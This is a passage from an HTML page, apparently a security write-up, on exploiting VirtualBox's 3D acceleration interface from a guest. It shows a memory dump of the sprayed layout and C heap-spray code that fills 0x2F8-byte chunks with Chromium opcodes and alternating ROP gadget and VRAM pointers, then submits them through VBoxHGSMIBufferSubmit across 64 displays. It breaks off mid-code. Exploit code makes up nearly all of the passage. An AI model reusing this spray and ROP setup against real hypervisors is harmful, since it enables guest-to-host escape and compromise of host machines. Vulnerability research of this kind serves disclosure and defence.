id=\"crayon-5b7b3e582f565861393961-38\"><span class=\"crayon-cn\">0x7f83cfd4f520<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f8485c3c403<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f849fff1650<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f565861393961-39\"><span class=\"crayon-cn\">0x7f83cfd4f530<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f8485c3c403<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f849fff1650<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f565861393961-40\"><span class=\"crayon-cn\">0x7f83cfd4f540<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f8485c3c403<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f849fff1650<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f565861393961-41\"><span class=\"crayon-cn\">0x7f83cfd4f550<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f8485c3c403<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f849fff1650<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f565861393961-42\"><span class=\"crayon-cn\">0x7f83cfd4f560<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f8485c3c403<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f849fff1650<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f565861393961-43\"><span class=\"crayon-cn\">0x7f83cfd4f570<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f8485c3c403<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f849fff1650<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f565861393961-44\"><span class=\"crayon-cn\">0x7f83cfd4f580<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f8485c3c403<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f849fff1650<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f565861393961-45\"><span class=\"crayon-cn\">0x7f83cfd4f590<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f8485c3c403<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f849fff1650<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f565861393961-46\"><span class=\"crayon-cn\">0x7f83cfd4f5a0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f8485c3c403<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f849fff1650<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f565861393961-47\"><span class=\"crayon-cn\">0x7f83cfd4f5b0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f8485c3c403<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f849fff1650<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f565861393961-48\"><span class=\"crayon-cn\">0x7f83cfd4f5c0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f8485c3c403<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f849fff1650<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f565861393961-49\"><span class=\"crayon-cn\">0x7f83cfd4f5d0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f8485c3c403<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f849fff1650<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f565861393961-50\"><span class=\"crayon-cn\">0x7f83cfd4f5e0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f8485c3c403<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f849fff1650<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f565861393961-51\"><span class=\"crayon-cn\">0x7f83cfd4f5f0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f8485c3c403<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f849fff1650<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f565861393961-52\"><span class=\"crayon-cn\">0x7f83cfd4f600<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f8485c3c403<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f849fff1650<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f565861393961-53\"><span class=\"crayon-cn\">0x7f83cfd4f610<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f8485c3c403<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000000025<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f565861393961-54\"><span class=\"crayon-cn\">0x7f83cfd4f620<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f83cfd4f940<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f83cfd4e020<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f565861393961-55\"><span class=\"crayon-cn\">0x7f83cfd4f630<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000007ffa000<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000000305<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f565861393961-56\"><span class=\"crayon-cn\">0x7f83cfd4f640<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f8485c3c403<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f849fff1650<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f565861393961-57\"><span class=\"crayon-cn\">0x7f83cfd4f650<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f8485c3c403<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f849fff1650<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f565861393961-58\"><span class=\"crayon-cn\">0x7f83cfd4f660<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f8485c3c403<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f849fff1650<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f565861393961-59\"><span class=\"crayon-cn\">0x7f83cfd4f670<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f8485c3c403<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f849fff1650<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f565861393961-60\"><span class=\"crayon-cn\">0x7f83cfd4f680<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f8485c3c403<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f849fff1650<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f565861393961-61\"><span class=\"crayon-cn\">0x7f83cfd4f690<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f8485c3c403<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f849fff1650<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f565861393961-62\"><span class=\"crayon-cn\">0x7f83cfd4f6a0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f8485c3c403<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f849fff1650<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f565861393961-63\"><span class=\"crayon-cn\">0x7f83cfd4f6b0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f8485c3c403<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f849fff1650<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f565861393961-64\"><span class=\"crayon-cn\">0x7f83cfd4f6c0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f8485c3c403<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f849fff1650<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f565861393961-65\"><span class=\"crayon-cn\">0x7f83cfd4f6d0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f8485c3c403<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f849fff1650<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0106 seconds] -->  <\/p>\n<p>Here is the main part of the heap sprayer. It creates 64 displays and sprays 16384 chunks of size 0x2F8 holding the buffer shown above for each display.<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5b7b3e582f573746146631\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> for (uint32_t i = 0; i &lt; 64; i++) {  \tuint32_t currentBufferSize = 0x2F8;    \t\/\/ We reinitialize the content of the buffer on each iteration not \t\tbecause it becomes dirty  \t\/\/ but because without it the spraying is too fast and many of \t\t\tsubmitted buffers  \t\/\/ are just ignored.  \tfor (uint32_t j = 0; j &lt; 1024 * 16; j++) {  \t\t*(pData + 3) = CR_EXTEND_OPCODE;  \t\t*(uint32_t*)(pData + 4) = 0; \/\/ unused  \t\t*(uint32_t*)(pData + 8)  \t\t\t= CR_PROGRAMNAMEDPARAMETER4DVNV_EXTEND_OPCODE;  \t\t*(uint32_t*)(pData + 12) = 0xFFFFFFFF; \/\/ id  \t\t*(uint32_t*)(pData + 16) = currentBufferSize; \/\/ len  \t\t*(uint64_t*)(pData + 20) = 0; \/\/ params[0]  \t\t*(uint64_t*)(pData + 28) = 0; \/\/ params[1]  \t\t*(uint64_t*)(pData + 36) = 0; \/\/ params[2]  \t\t*(uint64_t*)(pData + 44) = 0; \/\/ params[3]  \t\tconst uint32_t bufferOffset = 52;  \t\tbool spraySelector = 1;  \t\tfor (uint32_t off = bufferOffset; off &lt; bufferOffset + \t\t\t\tcurrentBufferSize; off += sizeof(uint64_t)) {  \t\t\tif (spraySelector) {  \t\t\t\t*(uint64_t*)(pData + off) = rop_1;  \t\t\t} else {  \t\t\t\t*(uint64_t*)(pData + off) = vram_ptr;  \t\t\t}  \t\t\tspraySelector = !spraySelector;  \t\t}    \t\tint rc = VBoxHGSMIBufferSubmit(guestCtx, pShgsmiHdr);  \t\tif (!RT_SUCCESS(rc)) {  \t\t\treturn STATUS_UNSUCCESSFUL;  \t\t}  \t}    \t\/* Create H3DORInstance (display) *\/  \tMySendCrCmdFlip(pDevExt, pContext, hostId, i);    \tRTThreadSleep(500);  }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f573746146631-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f573746146631-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f573746146631-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f573746146631-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f573746146631-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f573746146631-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f573746146631-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f573746146631-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f573746146631-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f573746146631-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f573746146631-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f573746146631-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f573746146631-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f573746146631-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f573746146631-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f573746146631-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f573746146631-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f573746146631-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f573746146631-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f573746146631-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f573746146631-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f573746146631-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f573746146631-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f573746146631-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f573746146631-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f573746146631-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f573746146631-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f573746146631-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f573746146631-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f573746146631-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f573746146631-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f573746146631-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f573746146631-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f573746146631-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f573746146631-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f573746146631-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f573746146631-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f573746146631-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f573746146631-39\">39<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f573746146631-1\"><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">uint32<\/span><span class=\"crayon-sy\">_<\/span>t<span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">64<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">++<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f573746146631-2\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">uint32_t <\/span><span class=\"crayon-v\">currentBufferSize<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x2F8<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f573746146631-3\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f573746146631-4\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-c\">\/\/ We reinitialize the content of the buffer on each iteration not \t\tbecause it becomes dirty<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f573746146631-5\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-c\">\/\/ but because without it the spraying is too fast and many of \t\t\tsubmitted buffers<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f573746146631-6\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-c\">\/\/ are just ignored.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f573746146631-7\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">uint32<\/span><span class=\"crayon-sy\">_<\/span>t<span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">j<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">j<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1024<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">j<\/span><span class=\"crayon-o\">++<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f573746146631-8\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">pData<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">CR_EXTEND_OPCODE<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f573746146631-9\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">uint32_t*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">pData<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/\/ unused<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f573746146631-10\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">uint32_t*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">pData<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f573746146631-11\"><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">CR_PROGRAMNAMEDPARAMETER4DVNV_EXTEND_OPCODE<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f573746146631-12\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">uint32_t*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">pData<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">12<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xFFFFFFFF<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/\/ id<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f573746146631-13\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">uint32_t*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">pData<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">currentBufferSize<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/\/ len<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f573746146631-14\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">uint64_t*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">pData<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">20<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/\/ params[0]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f573746146631-15\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">uint64_t*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">pData<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">28<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/\/ params[1]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f573746146631-16\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">uint64_t*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">pData<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">36<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/\/ params[2]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f573746146631-17\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">uint64_t*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">pData<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">44<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/\/ params[3]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f573746146631-18\"><span class=\"crayon-h\">\t\t<\/span><span 